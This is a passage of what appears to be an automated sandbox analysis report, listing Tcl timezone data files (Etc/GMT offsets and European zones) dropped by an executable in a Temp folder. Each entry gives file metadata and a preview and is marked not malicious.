                                                                                                                                                                                                                                                    Entropy (8bit):4.888744454221628
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-7) {. {-9223372036854775808 25200 0 GMT-7}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.8739009497670605
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-8) {. {-9223372036854775808 28800 0 GMT-8}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.9172336661585625
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-9) {. {-9223372036854775808 32400 0 GMT-9}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):153
                                                                                                                                                                                                                                                    Entropy (8bit):4.836974611939794
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/GMT0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):158
                                                                                                                                                                                                                                                    Entropy (8bit):4.862741414606617
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/Greenwich) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):105
                                                                                                                                                                                                                                                    Entropy (8bit):4.857741203314798
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/UCT) {. {-9223372036854775808 0 0 UCT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):105
                                                                                                                                                                                                                                                    Entropy (8bit):4.857741203314798
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/UTC) {. {-9223372036854775808 0 0 UTC}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):158
                                                                                                                                                                                                                                                    Entropy (8bit):4.825049978035721
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Etc/Universal) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):153
                                                                                                                                                                                                                                                    Entropy (8bit):4.824450775594084
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Etc/Zulu) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8783
                                                                                                                                                                                                                                                    Entropy (8bit):3.8169718785575446
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Amsterdam) {. {-9223372036854775808 1172 0 LMT}. {-4260212372 1172 0 AMT}. {-1693700372 4772 1 NST}. {-1680484772 1172 0 AMT}. {-1663453172 4772 1 NST}. {-1650147572 1172 0 AMT}. {-1633213172 4772 1 NST}. {-1617488372 1172 0 AMT}. {-1601158772 4772 1 NST}. {-1586038772 1172 0 AMT}. {-1569709172 4772 1 NST}. {-1554589172 1172 0 AMT}. {-1538259572 4772 1 NST}. {-1523139572 1172 0 AMT}. {-1507501172 4772 1 NST}. {-1490566772 1172 0 AMT}. {-1470176372 4772 1 NST}. {-1459117172 1172 0 AMT}. {-1443997172 4772 1 NST}. {-1427667572 1172 0 AMT}. {-1406672372 4772 1 NST}. {-1396217972 1172 0 AMT}. {-1376950772 4772 1 NST}. {-1364768372 1172 0 AMT}. {-1345414772 4772 1 NST}. {-1333318772 1172 0 AMT}. {-1313792372 4772 1 NST}. {-1301264372 1172 0 AMT}. {-1282256372 4772 1 NST}. {-1269814772 1172 0 AMT}. {-1250720372 4772 1 NST}. {-123836517
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6690
                                                                                                                                                                                                                                                    Entropy (8bit):3.730744509734253
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Andorra) {. {-9223372036854775808 364 0 LMT}. {-2177453164 0 0 WET}. {-733881600 3600 0 CET}. {481078800 7200 0 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST}. {749005200 3600 0 CET}. {764730000 7200 1 CEST}. {780454800 3600 0 CET}. {796179600 7200 1 CEST}. {811904400 3600 0 CET}. {828234000 7200 1 CEST}. {846378000 3600 0 CET}. {859683600 7200 1 CEST}. {877827600 3600 0 CET}. {891133200 7200 1 CEST}. {909277200 3600 0 CET}. {922582800 7200 1 CEST}. {941331600 3600 0 CET}. {9540
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7686
                                                                                                                                                                                                                                                    Entropy (8bit):3.635151038354021
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Athens) {. {-9223372036854775808 5692 0 LMT}. {-2344642492 5692 0 AMT}. {-1686101632 7200 0 EET}. {-1182996000 10800 1 EEST}. {-1178161200 7200 0 EET}. {-906861600 10800 1 EEST}. {-904878000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844477200 7200 1 CEST}. {-828237600 3600 0 CET}. {-812422800 7200 0 EET}. {-552362400 10800 1 EEST}. {-541652400 7200 0 EET}. {166485600 10800 1 EEST}. {186184800 7200 0 EET}. {198028800 10800 1 EEST}. {213753600 7200 0 EET}. {228873600 10800 1 EEST}. {244080000 7200 0 EET}. {260323200 10800 1 EEST}. {275446800 7200 0 EET}. {291798000 10800 1 EEST}. {307407600 7200 0 EET}. {323388000 10800 1 EEST}. {338936400 7200 0 EET}. {347148000 7200 0 EET}. {354675600 10800 1 EEST}. {370400400 7200 0 EET}. {386125200 10800 1 EEST}. {401850000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {4490
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.827362756219521
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Belfast) $TZData(:Europe/London).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7059
                                                                                                                                                                                                                                                    Entropy (8bit):3.733102701717456
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Belgrade) {. {-9223372036854775808 4920 0 LMT}. {-2713915320 3600 0 CET}. {-905824800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-777942000 7200 1 CEST}. {-766623600 3600 0 CET}. {407199600 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CES
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7746
                                                                                                                                                                                                                                                    Entropy (8bit):3.733442486698092
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Berlin) {. {-9223372036854775808 3208 0 LMT}. {-2422054408 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-776559600 10800 0 CEMT}. {-765936000 7200 1 CEST}. {-761180400 3600 0 CET}. {-757386000 3600 0 CET}. {-748479600 7200 1 CEST}. {-733273200 3600 0 CET}. {-717631200 7200 1 CEST}. {-714610800 10800 1 CEMT}. {-710380800 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.89628096026481
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Prague)]} {. LoadTimeZoneFile Europe/Prague.}.set TZData(:Europe/Bratislava) $TZData(:Europe/Prague).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8907
                                                                                                                                                                                                                                                    Entropy (8bit):3.75854119398076
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Brussels) {. {-9223372036854775808 1050 0 LMT}. {-2840141850 1050 0 BMT}. {-2450953050 0 0 WET}. {-1740355200 3600 0 CET}. {-1693702800 7200 0 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1613826000 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585530000 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1473642000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301263200 0 0 WET}. {-1284328800 3600 1 WEST}. {-126
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7706
                                                                                                                                                                                                                                                    Entropy (8bit):3.6365022673390808
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Bucharest) {. {-9223372036854775808 6264 0 LMT}. {-2469404664 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {296604000 10800 1 EEST}. {307486800 7200 0 EET}. {323816400 10800 1 EEST}. {338940000 7200 0 EET}. {354672000 10800 0 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7975
                                                                                                                                                                                                                                                    Entropy (8bit):3.7352769955376464
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Budapest) {. {-9223372036854775808 4580 0 LMT}. {-2500938980 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1640998800 3600 0 CET}. {-1633212000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1600466400 7200 1 CEST}. {-1581202800 3600 0 CET}. {-906771600 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-778471200 7200 1 CEST}. {-762660000 3600 0 CET}. {-749689200 7200 1 CEST}. {-733359600 3600 0 CET}. {-717634800 7200 1 CEST}. {-701910000 3600 0 CET}. {-686185200 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {-621990000 7200 1 CEST}. {-605660400 3600 0 CET}. {-492656400 7200 1 CEST}. {-481168800 3600 0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.905738881351689
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Zurich)]} {. LoadTimeZoneFile Europe/Zurich.}.set TZData(:Europe/Busingen) $TZData(:Europe/Zurich).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7825
                                                                                                                                                                                                                                                    Entropy (8bit):3.6745178518482375
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Chisinau) {. {-9223372036854775808 6920 0 LMT}. {-2840147720 6900 0 CMT}. {-1637114100 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {-927165600 10800 1 EEST}. {-898138800 7200 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-800154000 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {4179
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7458
                                                                                                                                                                                                                                                    Entropy (8bit):3.736544358182077
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Copenhagen) {. {-9223372036854775808 3020 0 LMT}. {-2524524620 3020 0 CMT}. {-2398294220 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680490800 3600 0 CET}. {-935110800 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-769388400 3600 0 CET}. {-747010800 7200 1 CEST}. {-736383600 3600 0 CET}. {-715215600 7200 1 CEST}. {-706748400 3600 0 CET}. {-683161200 7200 1 CEST}. {-675298800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9476
                                                                                                                                                                                                                                                    Entropy (8bit):3.729722634283483
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Dublin) {. {-9223372036854775808 -1500 0 LMT}. {-2821649700 -1521 0 DMT}. {-1691962479 2079 1 IST}. {-1680471279 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1517011200 0 0 IST}. {-1507500000 3600 1 IST}. {-1490565600 0 0 IST}. {-1473631200 3600 1 IST}. {-1460930400 0 0 IST}. {-1442786400 3600 1 IST}. {-1428876000 0 0 IST}. {-1410732000 3600 1 IST}. {-1396216800 0 0 IST}. {-1379282400 3600 1 IST}. {-1364767200 0 0 IST}. {-1348437600 3600 1 IST}. {-1333317600 0 0 IST}. {-1315778400 3600 1 IST}. {-1301263200 0 0 IST}. {-1284328800 3600 1 IST}. {-1269813600 0 0 IST}. {-1253484000 3600 1 IST}. {-1238364000 0 0 IST}. {-
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9181
                                                                                                                                                                                                                                                    Entropy (8bit):3.7982744899840535
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Gibraltar) {. {-9223372036854775808 -1284 0 LMT}. {-2821649916 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.830450830776494
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Guernsey) $TZData(:Europe/London).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7120
                                                                                                                                                                                                                                                    Entropy (8bit):3.635790220811118
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Helsinki) {. {-9223372036854775808 5989 0 LMT}. {-2890258789 5989 0 HMT}. {-1535938789 7200 0 EET}. {-875671200 10800 1 EEST}. {-859773600 7200 0 EET}. {354672000 10800 1 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {410220000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {449024400 10800 1 EEST}. {465354000 7200 0 EET}. {481078800 10800 1 EEST}. {496803600 7200 0 EET}. {512528400 10800 1 EEST}. {528253200 7200 0 EET}. {543978000 10800 1 EEST}. {559702800 7200 0 EET}. {575427600 10800 1 EEST}. {591152400 7200 0 EET}. {606877200 10800 1 EEST}. {622602000 7200 0 EET}. {638326800 10800 1 EEST}. {654656400 7200 0 EET}. {670381200 10800 1 EEST}. {686106000 7200 0 EET}. {701830800 10800 1 EEST}. {717555600 7200 0 EET}. {733280400 10800 1 EEST}. {749005200 7200 0 EET}. {764730000
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.866592240835745
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
